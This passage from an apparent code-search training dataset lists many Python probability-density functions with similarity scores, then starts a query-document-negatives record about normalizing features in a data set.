mean) ** 2) / (2 * (stddev ** 2))\n den = 2 * pi * (stddev ** 2)\n\n pdf = (1 / (den) ** 0.5) * (e ** exp)\n\n return pdf", "def pdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (x**(-self.alpha-1))*np.exp(-(self.beta/float(x)))", "def get_pdf(self, points=None):\n if points is not None:\n return self.parent.pdf(points)\n else:\n raise ValueError( 'Please digit an input for getPDF method')", "def pdf(self,x):\n if x in self.values:\n pdfValue = self.mapping[x]\n else:\n if self.isFloat:\n vals = sorted(list(self.values))\n idx = bisect.bisect(vals, x)\n pdfValue = self.mapping[list(vals)[idx]]\n else:\n self.raiseAnError(IOError,'Categorical distribution cannot calculate pdf for ' + str(x))\n return pdfValue", "def pdf(self, x, *args, **kwds):\n args, loc, scale = self._parse_args(*args, **kwds)\n x, loc, scale = map(np.asarray, (x, loc, scale))\n args = tuple(map(np.asarray, args))\n dtyp = np.find_common_type([x.dtype, np.float64], [])\n x = np.asarray((x - loc) / scale, dtype=dtyp)\n cond0 = self._argcheck(*args) & (scale > 0)\n cond1 = self._support_mask(x) & (scale > 0)\n cond = cond0 & cond1\n output = np.zeros(np.shape(cond), dtyp)\n np.putmask(output, (1 - cond0) + np.isnan(x), self.badvalue)\n if np.any(cond):\n goodargs = argsreduce(cond, *((x,) + args + (scale,)))\n s, goodargs = goodargs[-1], goodargs[:-1]\n # use trapezoidal integration rule to estimate normalization factor\n # # end = (np.max(x) + np.max(goodargs[1]) + 2 * np.max(goodargs[2]) + 1) * 4\n #\n # end = np.max([np.max(x) + np.max(goodargs[2]), 1000])\n # num_segments = int(end * 1.666)\n # r = np.linspace(self.a + 1e-07,\n # end,\n # num_segments)\n # norm_scale = np.array([scale[0]] * num_segments)\n # norm_args = [np.array([arg[0]] * num_segments) for arg in goodargs]\n # len_scale = len(scale)\n # scale = norm_scale * np.trapz(self._pdf(r, *norm_args[1:]), r)[:len_scale]\n mu = goodargs[1]\n b = goodargs[2]\n s = 1 - 0.5 * np.exp((0 - mu) / b)\n np.place(output, cond, self._pdf(*goodargs) / s)\n if output.ndim == 0:\n return output[()]\n return output", "def tabulate_pdf(self):\n\n from mitsuba.core import Float, Vector2f, ScalarVector2f\n\n extents = self.bounds.extents()\n endpoint = self.bounds.max - extents / ScalarVector2f(self.res)\n\n # Compute a set of nodes where the PDF should be evaluated\n x, y = ek.meshgrid(\n ek.linspace(Float, self.bounds.min.x, endpoint.x, self.res.x),\n ek.linspace(Float, self.bounds.min.y, endpoint.y, self.res.y)\n )\n\n endpoint = extents / ScalarVector2f(self.res)\n eps = 1e-4\n nx = ek.linspace(Float, eps, endpoint.x * (1 - eps), self.ires)\n ny = ek.linspace(Float, eps, endpoint.y * (1 - eps), self.ires)\n wx = [1 / (self.ires - 1)] * self.ires\n wy = [1 / (self.ires - 1)] * self.ires\n wx[0] = wx[-1] = wx[0] * .5\n wy[0] = wy[-1] = wy[0] * .5\n\n integral = 0\n\n self.histogram_start = time.time()\n for yi, dy in enumerate(ny):\n for xi, dx in enumerate(nx):\n xy = self.domain.map_forward(Vector2f(x + dx, y + dy))\n pdf = self.pdf_func(xy)\n integral = ek.fmadd(pdf, wx[xi] * wy[yi], integral)\n self.histogram_end = time.time()\n\n self.pdf = integral * (ek.hprod(extents / ScalarVector2f(self.res))\n * self.sample_count)\n\n # A few sanity checks\n pdf_min = ek.hmin(self.pdf) / self.sample_count\n if not pdf_min >= 0:\n self._log('Failure: Encountered a cell with a '\n 'negative PDF value: %f' % pdf_min)\n self.fail = True\n\n self.pdf_sum = ek.hsum(self.pdf) / self.sample_count\n if self.pdf_sum > 1.1:\n self._log('Failure: PDF integrates to a value greater '\n 'than 1.0: %f' % self.pdf_sum)\n self.fail = True", "def _evaluate_point_logpdf(args):\n x, data, cho_factor = args\n\n # Use Cholesky decomposition to avoid direct inversion of covariance matrix\n diff = data - x\n tdiff = la.cho_solve(cho_factor, diff.T, check_finite=False).T\n diff *= tdiff\n\n # Work in the log to avoid large numbers\n return logsumexp(-np.sum(diff, axis=1)/2.0)", "def poisson_pdf(x, u, log=False):\n #return np.exp(-u)*(u**x)/factorial(x)\n #return np.exp(-u)*(u**x)/gamma(x+1)\n if log:\n return poisson.logpmf(x, u)\n return poisson.pmf(x, u)", "def pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a negative value!\")\n\n if self.is_fit:\n if x >= 0:\n enu = np.power(self.alpha, x) * np.power(np.e, -self.alpha)\n den = np.math.factorial(x)\n return enu / den\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def log_pdf_at_x(x):\n return lambda point: gs.log(\n self.information_manifold.point_to_pdf(point)(x)\n )", "def pdf(x, a, b):\n with mp.extradps(5):\n a, b = _validate_a_b(a, b)\n x = mp.mpf(x)\n if x < 0 or x > 1:\n return mp.zero\n if x == 0 and a < 1:\n return mp.inf\n if x == 1 and b < 1:\n return mp.inf\n return (mp.power(x, a - 1) * mp.power(1 - x, b - 1) /\n mp.beta(a, b))", "def pdf(self, x, log = False):\n if log:\n return D.logsumexp(\n D.multiple_gauss_den(x, self.mu, self.va, log = True)\n + N.log(self.w))\n else:\n return N.sum(D.multiple_gauss_den(x, self.mu, self.va) * self.w, 1)", "def pdfInTransformedSpace(self,x):\n if self.method == 'pca':\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfInTransformedSpace = self._distribution.pdfInTransformedSpace(coordinate)\n else:\n self.raiseAnError(NotImplementedError,'ppfTransformedSpace not yet implemented for ' + self.method + ' method')\n return pdfInTransformedSpace", "def pdf(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.pdf_link(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n return self.pdf_link(inv_link_f, y, Y_metadata=Y_metadata)", "def _dncb_pdf(x, a1, a2, mu1, mu2):\n out = st.beta.pdf(x, a1, a2, loc=0)\n out *= np.exp(-mu1-mu2)\n out *= hchg(x, a1, a2, mu1, mu2)\n return out", "def pdf(self, x: float) -> float:\n\n return (1.0 / (self.sigma * np.sqrt(2*math.pi))) * \\\n np.exp(-0.5*((x - self.mu) / self.sigma) ** 2)", "def pdf(self, x):\n if type(x) is not np.ndarray:\n raise TypeError(\"x must be a numpy.ndarray\")\n if len(x.shape) != 2:\n str = 'x must have the shape ({}, 1)'.format(d)\n raise ValueError(str)\n d = self.mean.shape[0]\n if x.shape[0] != d or x.shape[1] != 1:\n str = 'x must have the shape ({}, 1)'.format(d)\n raise ValueError(str)\n const = 1 / np.sqrt(((2 * np.pi) ** d) * (np.linalg.det(self.cov)))\n n_dev = -(x - self.mean).T\n ins = np.matmul(n_dev, np.linalg.inv(self.cov))\n half_dev = (x - self.mean) / 2\n out = np.matmul(ins, half_dev)\n exp = np.exp(out)\n pdf = const * exp\n pdf = pdf.reshape(-1)[0]\n return pdf", "def PoissonPDF(v):\n from scipy.special import gamma\n\n a = 3.24174\n b = 3.24269\n c = 1.26861\n g = gamma(a / c)\n k1 = c * b ** (a / c) / g\n pdf = k1 * np.power(v, (a - 1)) * np.exp(- b * np.power(v, c))\n return pdf", "def pdf(sample, location=0, scale=1):\n location = T.cast(location, theano.config.floatX)\n SQRT_2_PI = np.sqrt(2 * PI)\n SQRT_2_PI = T.cast(SQRT_2_PI, theano.config.floatX)\n\n divisor = 2 * scale ** 2 # + epsilon,\n divisor = T.cast(divisor, theano.config.floatX)\n if isinstance(location, T.TensorVariable) and location.ndim == 0:\n location = location.dimshuffle('x')\n\n exp_arg = -((sample - location) ** 2) / divisor\n z = 1. / (SQRT_2_PI * scale + epsilon)\n\n return T.exp(exp_arg) * z", "def pdf(self, xs):\n xs = np.atleast_2d(xs)\n return self.factor * np.exp(-0.5 * np.sum(xs * xs, axis=0))", "def pdf(self, X, Y):\n assert self.fitted, \"model must be fitted to compute likelihood score\"\n X, Y = self._handle_input_dimensionality(X, Y, fitting=False)\n p = self.sess.run(self.pdf_, feed_dict={self.X_ph: X, self.Y_ph: Y})\n assert p.ndim == 1 and p.shape[0] == X.shape[0]\n return p", "def pdf(self, x):\n from scipy.special import beta\n return (2 / beta(self.m / 2.0, self.n / 2.0) * x ** (self.m - 1) *\n (1 - x * x) ** (self.n / 2.0 - 1))", "def pdf_define(param_td):\n parametric_family = param_td['parametric_family']\n true_parameters = param_td['true_parameters']\n\n eval_str = 'scipy.stats.' + str(parametric_family) + \\\n '.pdf' + '(x, ' + str(true_parameters)[1:-1] + ')'\n\n eval_str = eval_str.replace(\"'\", \"\").replace(\":\", \"=\")\n\n return lambda x: eval(eval_str) # define pdf_true", "def pdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n #return stats.gamma.pdf(obs,a = self.gp_link.transf(gp)/self.variance,scale=self.variance)\r\n alpha = link_f*self.beta\r\n objective = (y**(alpha - 1.) * np.exp(-self.beta*y) * self.beta**alpha)/ special.gamma(alpha)\r\n return np.exp(np.sum(np.log(objective)))", "def dist_pdf(z, loc, scale, a, tail=0, tail_len=0):\n pdf1 = gamma.pdf(z, loc=loc, scale=scale, a=a)\n\n tpeak = loc + (a-1)*scale\n tcut = tail_len + loc + (a-1)*scale\n tstart = gamma.interval(0.999, loc=loc, scale=scale, a=a)[0] #start at 1% of cdf \n pdf2 = np.ones_like(z)\n pdf2[z < tpeak] = (z[z < tpeak] - tstart)/(tpeak - tstart)\n pdf2[z > tpeak] = (tcut - z[z > tpeak])/(tcut - tpeak)\n pdf2[z > tcut] = 0\n pdf2[z < tstart] = 0\n\n pdf = pdf1 + pdf2*tail\n\n pdf[z < 100] = 0\n\n return pdf/np.trapz(pdf, z)", "def pdf(self, x):\r\n return self._coef * reduce(mul, [xx ** (aa-1) for (xx, aa) in zip(x, self._alpha)])", "def pdf(data, args):\n return Plot._dist(data, args)", "def pdf_link(self, link_f, y, extra_data=None):\r\n #Assumes no covariance, exp, sum, log for numerical stability\r\n return np.exp(np.sum(np.log(stats.norm.pdf(y, link_f, np.sqrt(self.variance)))))", "def log_pdf_derivative(x):\n return gs.autodiff.jacobian(log_pdf_at_x(x))(base_point)", "def pdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n return np.prod(stats.poisson.pmf(y,link_f))", "def n_pdf(x):\n return 1/np.sqrt(2*np.pi)*np.exp(-x**2/2)", "def processedPdf(self, grid, dataSegment):\n # if self.multipyLikelihoods == True, multi-dimensional data is processed one dimension at a time;\n # likelihoods are then multiplied\n if len(dataSegment.shape) == 2 and self.multiplyLikelihoods:\n return np.prod(np.array([self.processedPdf(grid, d) for d in dataSegment.T]), axis=0)\n\n # check for missing data\n if np.isnan(dataSegment).any():\n return np.ones_like(grid[0]) # grid of ones does not alter the current prior distribution\n\n return self.pdf(grid, dataSegment)", "def logpdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.logpdf_link(link_f, y, extra_data=extra_data)", "def pdf_link(self, link_f, y, extra_data=None):\r\n assert np.atleast_1d(link_f).shape == np.atleast_1d(y).shape\r\n e = y - link_f\r\n #Careful gamma(big_number) is infinity!\r\n objective = ((np.exp(gammaln((self.v + 1)*0.5) - gammaln(self.v * 0.5))\r\n / (np.sqrt(self.v * np.pi * self.sigma2)))\r\n * ((1 + (1./float(self.v))*((e**2)/float(self.sigma2)))**(-0.5*(self.v + 1)))\r\n )\r\n return np.prod(objective)", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def logPdf(self,x):\n logPdf = np.log(self.pdf(x))\n return logPdf", "def pdf(s, x):\r\n x = Basic.sympify(x)\r\n return 1/(s.sigma*sqrt(2*pi)) * exp(-(x-s.mu)**2 / (2*s.sigma**2))", "def calculate_prp(self, ref_point: np.ndarray, f_current: np.ndarray) -> np.ndarray:\n\n # distance\n d = np.linalg.norm(np.atleast_2d(ref_point - f_current))\n\n # unit vectors\n ei = np.array([np.zeros(len(ref_point))])\n es = np.repeat(ei, len(ref_point), axis=0)\n\n for i, j in enumerate(es):\n for ind, _ in enumerate(j):\n if ind == i:\n j[ind] = 1\n\n return ref_point + (d * es)", "def pdf(self, x, mu, **kwargs):\n xrange = self._xrange_nonzero_(mu)\n \n if is_arraylike(x):\n x = np.asarray(x) \n Poisson_continuous = np.zeros(len(x)) \n flag_measure_it = (x>=xrange[0]) & (x<xrange[1])\n Poisson_continuous[flag_measure_it] = np.exp(-x[flag_measure_it]) if mu<=0.25 else \\\n mu**x[flag_measure_it] * np.exp(-mu) / special.gamma(1+x[flag_measure_it])\n return Poisson_continuous \n\n return 0 if (x>=xrange[0]) or (x<xrange[1]) else np.exp(-x) if mu<=0.25 else \\\n mu**x * np.exp(-mu) / special.gamma(1+x)", "def pdf(self, x, norm=False):\n raise NotImplementedError(\"Normalized posterior not implemented\")", "def pdf(x, mu, std):\n if std == 0:\n return 0\n return (1.0 / (std * sqrt(2 * pi))) * np.exp(-(x - mu) ** 2 / (2 * std ** 2))", "def define_pdf(self, values: torch.Tensor, weights: torch.Tensor, inds: torch.Tensor) -> Distribution:\n\n raise NotImplementedError()", "def pdf(s, x):\r\n x = Basic.sympify(x)\r\n if not isinstance(x, Number):\r\n raise NotImplementedError(\"SymPy does not yet support\"\r\n \"piecewise functions\")\r\n if x < s.a or x > s.b:\r\n return Rational(0)\r\n return 1/(s.b-s.a)", "def pdf(self, K):\n return derivative(partial(self.option_price, payoff='Call'), K, dx=ONE_BP/10,\n n=2,\n order=3)", "def __call__(self, x, **kwargs):\n if len(kwargs) > 0:\n self.update(**kwargs)\n p = np.atleast_2d(np.zeros_like(x))\n a, b = self.get_args(x[...,0])\n p[...,1] = self.distribution.pdf(x[...,1], a, b, loc=self.loc(x[...,0]), scale=self.scale(x[...,0]))\n with np.errstate(invalid='ignore'):\n p[...,1] = np.log(p[...,1])\n return p", "def log_pdf(self, x):\n if x < 0:\n raise Exception(\"input value x can't be a negative value!\")\n\n if self.is_fit:\n if x >= 0:\n return -np.log(np.math.factorial(x)) + \\\n x * np.log(self.alpha) - self.alpha\n else:\n return 0\n else:\n raise Exception(\"Distribution doesn't have all parameters set!\")", "def pdf_from_cdf(data, idx, what):\n\n cdf = data[what + '_sum'].cumsum() / data[what + '_sum'].sum()\n cdfi = scipy.interpolate.interp1d(cdf.index, cdf, 'linear', bounds_error=False)(idx)\n pdfi = np.hstack((cdfi[0], np.diff(cdfi) / np.diff(idx)))\n return pdfi", "def pdf(self, x):\n x = self.lib.atleast_2d(x)\n es = x[:, None, :] - self.means[None, :, :]\n\n # The code below does: exp[i] = es[i].T @ self.inverse_covariances_device[i] @ es[i]\n exp = es[:, :, None, :] @ self._inverse_covariances[None, :, :, :] @ es[:, :, :, None]\n r = self.lib.exp(-0.5*exp).squeeze()\n\n # The code below does: result = sum(r[i] * self.weights_device[i] * self.constants_device[i])\n result = numpy.sum(self.lib.atleast_2d(self._constants * self.weights * r), axis=1)\n\n return result", "def proof_pdf(self):\n return self._proof_pdf", "def pdf(self, x):\r\n if type(x) is not np.ndarray:\r\n raise TypeError(\"x must be a numpy.ndarray\")\r\n if ((len(x.shape) != 2 or x.shape[1] != 1\r\n or x.shape[0] != self.mean.shape[0])):\r\n raise ValueError(\"x must have the shape ({}, 1)\"\r\n .format(self.mean.shape[0]))\r\n res = np.matmul((x - self.mean).T, np.linalg.inv(self.cov))\r\n res = np.exp(np.matmul(res, (x - self.mean)) / -2)\r\n res /= np.sqrt(pow(2 * np.pi, x.shape[0]) * np.linalg.det(self.cov))\r\n return res[0][0]", "def get_pdf(self, size=1e6):\n # Separate parts of parameters\n arg = self.best_params[:-2]\n loc = self.best_params[-2]\n scale = self.best_params[-1]\n\n # Get sane start and end points of distribution\n start = self.best_distribution.ppf(0.01, *arg, loc=loc, scale=scale) if arg else self.best_distribution.ppf(0.01, loc=loc, scale=scale)\n end = self.best_distribution.ppf(0.99, *arg, loc=loc, scale=scale) if arg else self.best_distribution.ppf(0.99, loc=loc, scale=scale)\n\n # Build PDF and turn into pandas Series\n x = np.linspace(start, end, size)\n y = self.best_distribution.pdf(x, loc=loc, scale=scale, *arg)\n pdf = pd.Series(y, x)\n\n return pdf", "def getPDFValue(self, value):\n pdfValue = self.pdfSample.get(value, None)\n if pdfValue != None:\n return pdfValue\n \n pdfValue = self.__pdfFunction(value)\n self.pdfSample[value] = pdfValue\n return pdfValue", "def pdf(cls, params, xs=None):\n n = params['negative']\n if xs is None:\n # Find nice range to graph\n lower = ((-1 if n else 1) *\n params['loc'] / (np.exp(params['scale']) **\n cls.standard_deviations_in_default_range))[0, 0]\n upper = ((-1 if n else 1) *\n params['loc'] * (np.exp(params['scale']) **\n cls.standard_deviations_in_default_range))[0, 0]\n if n:\n lower, upper = upper, lower\n\n xs = np.linspace(\n (lower if np.isnan(params['minimum']) else params['minimum']).ravel(),\n (upper if np.isnan(params['maximum']) else params['maximum']).ravel(),\n cls.default_number_points_in_pdf\n ).ravel()\n\n ys = stats.lognorm.pdf(\n -1 * xs if n else xs,\n params['scale'],\n scale=np.exp(params['loc'])\n )\n return xs, ys.ravel()", "def pdf(self, x, mean, cov):\r\n dim, mean, cov = _process_parameters(None, mean, cov)\r\n x = _process_quantiles(x, dim)\r\n prec_U, log_det_cov = _psd_pinv_decomposed_log_pdet(cov)\r\n out = np.exp(self._logpdf(x, mean, prec_U, log_det_cov))\r\n return _squeeze_output(out)", "def contrast_pdf(contdc, contdc_sigma, dc_tru, dc_sigma, contrast_axis, npts=8000, display=False):\n\n dc_axis = np.linspace(dc_tru - 8 * dc_sigma, dc_tru + 8 * dc_sigma, npts)\n dc_mesh, contrast_mesh = np.meshgrid(dc_axis, contrast_axis)\n contdc_mesh = dc_mesh * contrast_mesh\n\n pdf_contdc = scipy.stats.rice.pdf(contdc_mesh, contdc / contdc_sigma, scale=contdc_sigma, loc=0.)\n pdf_dc, _ = norm_pdf(dc_tru, dc_sigma, x=dc_mesh)\n joint_pdf = pdf_contdc * pdf_dc\n\n # normalise joint PDF\n area = np.trapz(np.trapz(joint_pdf, contdc_mesh, axis=0), dc_axis)\n joint_pdf /= area\n\n # calculate the ratio pdf\n integrand = abs(dc_mesh) * joint_pdf\n contrast_pdf = np.trapz(integrand, dc_mesh, axis=1)\n\n if display:\n plt.figure()\n plt.imshow(pdf_contdc)\n plt.colorbar()\n\n plt.figure()\n plt.imshow(pdf_dc)\n plt.colorbar()\n\n plt.figure()\n plt.imshow(joint_pdf)\n plt.colorbar()\n\n plt.figure()\n plt.imshow(integrand)\n plt.colorbar()\n\n plt.figure()\n plt.plot(contrast_axis, contrast_pdf)\n\n plt.show()\n\n return contrast_pdf", "def logpdf(self, x):\n if self.transform is not None:\n x = self.transform(x) \n return (-self.alpha-1)*np.log(x) - (self.beta/float(x))", "def make_joint_pdf(self, benchmark) :\n \n #distortion case 1 -- taxes/subsidy uncorrelated with firm size or benchmark case where no tax/subsidy at all\n if self.distortion_case == 1 or benchmark == 1 : \n self.joint_pdf = self.prod_pdf_matrix * self.policy_pdf \n \n #distortion case 2 -- tax/subsidy negatively correlated with firm size, subsidize only fraction self.subsidy_frac of lowest prod plants\n if self.distortion_case == 2:\n \n self.joint_pdf = np.zeros((self.Ns,self.ntau))\n prod_cdf = np.cumsum(self.prod_pdf) # cdf over the idiosyncratic draws of s\n I=np.where(prod_cdf <= self.subsidy_frac)\n self.joint_pdf[I,0]=self.prod_pdf[I] #take the lower part of the pdf over idiosyncratic draws of s\n \n #if there is excempt firms\n if self.excempt_frac>0:\n #take the indices of pdf for s for the interval sub and sub+nosub. \n I=np.where((prod_cdf > self.subsidy_frac) & (prod_cdf <= self.subsidy_frac + self.excempt_frac))\n self.joint_pdf[I,1] = self.prod_pdf[I]\n \n J=np.where(prod_cdf > self.excempt_frac + self.subsidy_frac)\n self.joint_pdf[J,2]=self.prod_pdf[J]\n \n \n #distortion case 3 -- tax/subsidy positively correlated with firm size, subsidize only fraction self.subsidy_frac of highest prod plants\n elif self.distortion_case == 3:\n \n self.joint_pdf = np.zeros((self.Ns,self.ntau))\n prod_cdf = np.cumsum(self.prod_pdf) # cdf over the idiosyncratic draws of s\n I=np.where(prod_cdf <= 1-self.subsidy_frac - self.excempt_frac)\n self.joint_pdf[I,2]=self.prod_pdf[I] #take the lower part of the pdf over idiosyncratic draws of s to tax\n \n #if there is excempt firms\n if self.excempt_frac>0:\n #take the indices of pdf for s for the interval sub and sub+nosub. \n I = np.where((prod_cdf > 1 - self.subsidy_frac - self.excempt_frac) & (prod_cdf <= 1 - self.subsidy_frac))\n self.joint_pdf [I,1] = self.prod_pdf[I]\n \n J=np.where(prod_cdf > 1 - self.subsidy_frac)\n self.joint_pdf[J,0] = self.prod_pdf[J]", "def generate_pdf():\n uu_id = uuid.uuid4().hex\n current_app.logger.debug(uu_id)\n current_app.logger.debug(request.form)\n tmp_pdf_filename = \"{}_tmp.pdf\".format(uu_id)\n pdf_filename = \"{}.pdf\".format(uu_id)\n tmp_out_pdf_path = os.path.join(\n current_app.config[\"UPLOAD_FOLDER\"], tmp_pdf_filename\n )\n out_pdf_path = os.path.join(\n current_app.config[\"UPLOAD_FOLDER\"], pdf_filename\n )\n fill_template_from_input(\n request.form,\n current_app.config[\"PDF_TEMPLATE_PATH\"],\n tmp_out_pdf_path,\n INPUT_FORM_MAP\n )\n fdf_tmp = os.path.join(\n current_app.config[\"UPLOAD_FOLDER\"], 'tmp.fdf'\n )\n os.system('pdftk ' + tmp_out_pdf_path + ' generate_fdf output ' + fdf_tmp)\n os.system(\n 'pdftk ' + tmp_out_pdf_path + ' fill_form ' + fdf_tmp +\n ' output ' + out_pdf_path + ' flatten'\n )\n os.remove(tmp_out_pdf_path)\n return pdf_filename", "def pdf(self,x,mu,sigma=None,theta=None,alpha=None):\n\t\n\t\tr,p = self.convertParameters(mu,sigma,theta,alpha)\n\t\treturn self.pdfPR(x,p,r)", "def pdf(self, x, log=False):\n assert x.shape[0] == self.num_vars()\n if log is False:\n marginal_vals = self.evaluate(\"pdf\", x)\n return np.prod(marginal_vals, axis=0)[:, None]\n\n marginal_vals = self.evaluate(\"logpdf\", x)\n return np.sum(marginal_vals, axis=0)[:, None]", "def conditional_pdf(self, x1, x2 = None):\n return np.exp(self.conditional_logpdf(x1, x2))", "def pdf(self, data=None):\n ndim = self.lam.size\n if data is None:\n raise ValueError('No data given!')\n self.data = np.atleast_2d(data)\n # (T, k) array\n diff = self.data - self.const_mu()\n # (k, T) array\n diff_norm = scl.solve(self.const_sigma(), diff.T)\n # (T, ) array\n diff_sandwich = (diff.T * diff_norm).sum(0)\n term1 = ((np.pi * self.eta) ** ndim\n * scl.det(self.const_sigma())) **(-.5)\n term2 = np.exp(gammaln((self.eta + self.ndim) / 2)\n - gammaln(self.eta / 2))\n term3 = (1 + diff_sandwich / self.eta) ** (- (self.eta + ndim) / 2)\n return term1 * term2 * term3", "def first_min_pdf(pdf):\n\t# to be continued in the future if necessary for exact accuracy\n\treturn None", "def logpdf(self, point: np.ndarray) -> float:\n point = np.array(point)\n if point.size > 1:\n point = point.reshape((2, -1))\n parts = self._logp.T + np.reshape([rv.logpdf(point) for rv in self._rvs], (2, -1))\n return logsumexp(parts, axis=0)\n parts = self._logp + np.array([rv.logpdf(point) for rv in self._rvs])\n return logsumexp(parts)", "def dirichlet_pdf(x, alpha):\n density = reduce(operator.mul, \n [x[i]**(alpha[i]-1.0) for i in range(len(alpha))])\n norm_top = gamma(np.sum(alpha))\n norm_bot = reduce(operator.mul, [gamma(a) for a in alpha])\n return (norm_top / norm_bot) * density", "def is_pdf(prediction):\n probs = [y for x, y in prediction.items()]\n\n distance = 1 - sum(probs) \n assert distance >= -0.001 \n if distance >= -0.001 and distance < 1:\n return True", "def pdf(self):\n\n pdf = PDF(self.valuesArray)\n return pdf.axes[0], pdf.pdf", "def counting_pdf(x, y, u, b, tau=1, log=False):\n if log:\n return (poisson_pdf(x, u+b, log=True))+(poisson_pdf(y, tau*b, log=True))\n return poisson_pdf(x, u+b)*poisson_pdf(y, tau*b)", "def logpdf(self, f, y, Y_metadata=None):\n if isinstance(self.gp_link, link_functions.Identity):\n return self.logpdf_link(f, y, Y_metadata=Y_metadata)\n else:\n inv_link_f = self.gp_link.transf(f)\n return self.logpdf_link(inv_link_f, y, Y_metadata=Y_metadata)", "def student(x, y, nu, params):\n\n numer = special.gamma((nu + 2.) / 2.)\n denom = special.gamma(nu / 2.) * nu * np.pi * (params[2]**2)\n\n C = numer / denom\n\n ex = ((x - params[0])**2) / params[2]**2\n ey = ((y - params[1])**2) / params[2]**2\n mix = ex + ey\n body = (1. + (1./nu) * mix) ** (-1. * (nu + 2.)/2.)\n\n pdf = C * body\n\n return pdf", "def dt(x, df=1, loc=0, scale=1, ncp=None, log=False):\n # ==========================================================================\n if log:\n return t.logpdf(x, df=df, loc=0, scale=1)\n else:\n return t.pdf(x, df=df, loc=0, scale=1)", "def target_pdf(p, disttype):\n me, cov = target_params(disttype)\n if disttype == 'round' or disttype == 'correlated':\n prob = multivariate_normal.pdf(p, mean=me, cov=cov)\n elif disttype == 'bimodal' or disttype == 'close_bimodal':\n prob0 = multivariate_normal.pdf(p, mean=me[0], cov=cov)\n prob1 = multivariate_normal.pdf(p, mean=me[1], cov=cov)\n prob = max([prob0, prob1]) \n \n return prob", "def dlogpdf_df(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n dlogpdf_dlink = self.dlogpdf_dlink(link_f, y, extra_data=extra_data)\r\n dlink_df = self.gp_link.dtransf_df(f)\r\n return chain_1(dlogpdf_dlink, dlink_df)" ]
[ "0.7687768", "0.74538267", "0.74296933", "0.73647636", "0.7215672", "0.71905404", "0.7085889", "0.70647675", "0.70454675", "0.69965947", "0.69869745", "0.69869745", "0.697386", "0.6928952", "0.6928614", "0.69227785", "0.69120353", "0.684598", "0.68387115", "0.6809058", "0.67874706", "0.6771798", "0.67444533", "0.6691996", "0.6675699", "0.66396797", "0.6585872", "0.65762913", "0.6573601", "0.6566741", "0.6531283", "0.65311116", "0.6469278", "0.64389235", "0.64297026", "0.6427634", "0.64106846", "0.63933426", "0.6349968", "0.63415104", "0.6321465", "0.631499", "0.6298606", "0.62846583", "0.6282403", "0.62630165", "0.6260559", "0.6256774", "0.62335587", "0.62116724", "0.6211407", "0.621105", "0.62103486", "0.62093467", "0.62031984", "0.6199399", "0.619845", "0.619568", "0.6179112", "0.61697483", "0.61658317", "0.6160165", "0.6160165", "0.6157524", "0.6147445", "0.61277574", "0.6117766", "0.6108891", "0.60878426", "0.60832435", "0.60715675", "0.60365534", "0.6018812", "0.60017806", "0.5962629", "0.595417", "0.59522206", "0.5948527", "0.59162486", "0.5909149", "0.5891488", "0.589002", "0.58833516", "0.5883257", "0.58788425", "0.5875128", "0.58631617", "0.5832027", "0.58288854", "0.5824175", "0.58158", "0.5813303", "0.580978", "0.5800487", "0.5776561", "0.5765124", "0.5764594", "0.5758521", "0.5758104", "0.5755355" ]
0.73273325
4
Normalize the features in the data set.
def normalize_features(df): mu = df.mean() sigma = df.std() if (sigma == 0).any(): raise Exception("One or more features had the same value for all samples, and thus could " + \ "not be normalized. Please do not include features with only a single value " + \ "in your model.") df_normalized = (df - df.mean()) / df.std() return df_normalized, mu, sigma
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def normalizeFeatureVector(self):\n # Normalize features\n total = 0.0\n for v in self.features.values(): total += abs(v)\n if total == 0.0: \n total = 1.0\n for k,v in self.features.iteritems():\n self.features[k] = float(v) / total", "def _normalize(self, dataset):\n if self.max is None: # if we are normalizing the training set\n self.max, self.min = dataset.max(), dataset.min() # find max, min value for each columns\n for row in dataset.index: # for each row in dataset\n for col in self.features: # for each feature in the instance (exclude target)\n dataset.at[row, col] = (dataset.at[row, col] - self.min[col]) / (self.max[col] - self.min[col]) if col != \"Bias\" else 1", "def normalize_data(self):\n self.x_mean, self.x_std = du.get_mean_std(self.x_train)\n self.x_train = du.normalize(self.x_train, self.x_mean, self.x_std)\n if self.x_test is not None and self.y_test is not None:\n self.x_test = du.normalize(self.x_test, self.x_mean, self.x_std)\n self.normalized_data = True", "def _normalize_feature(self, feature):\n\n for ic in range(self.data_shape[0]):\n feature[ic] = (feature[ic] - self.feature_mean[ic]\n ) / self.feature_std[ic]\n return feature", "def normalize_features(self, data_dict, ind):\n pre_norm_list = []\n for title in data_dict:\n pre_norm_list.append(data_dict[title][ind])\n if self.normalization_method == 'min_max':\n mini, maxi, norm_list = normalize.min_max_normalize(pre_norm_list)\n self.normalization_n.append(mini)\n self.normalization_d.append(maxi - mini)\n elif self.normalization_method == 'z_score':\n mean, var, norm_list = normalize.z_score_normalize(pre_norm_list)\n self.normalization_n.append(mean)\n self.normalization_d.append(var)\n elif self.normalization_method == 'none':\n norm_list = pre_norm_list[:]\n self.normalization_n.append(0)\n self.normalization_d.append(1)\n for i, title in enumerate(data_dict):\n data_dict[title][ind] = norm_list[i]", "def feature_normalize(X):\n X_mean = np.mean(X, axis=0)\n X_std = np.std(X, axis=0)\n X_std[0, 0] = 1\n X_normalize = (X - X_mean) / X_std\n X_normalize[:, 0] = 1.0\n return X_normalize, X_mean, X_std", "def normalize(self):\n d = learning_utils.convert_data_to_2d(self._data)\n d = learning_utils.normalize_2d(d)\n self._data = learning_utils.convert_data_to_1d(d)", "def normalize_features(X):\n std = X.std(axis=0)\n std = np.where(std == 0, 1, std) # to avoid division by zero\n x_normed = (X - X.mean(axis=0)) / std\n return x_normed", "def normalize_features(dataframe):\n print(\"Normalizing feature matrix...\")\n tmp = 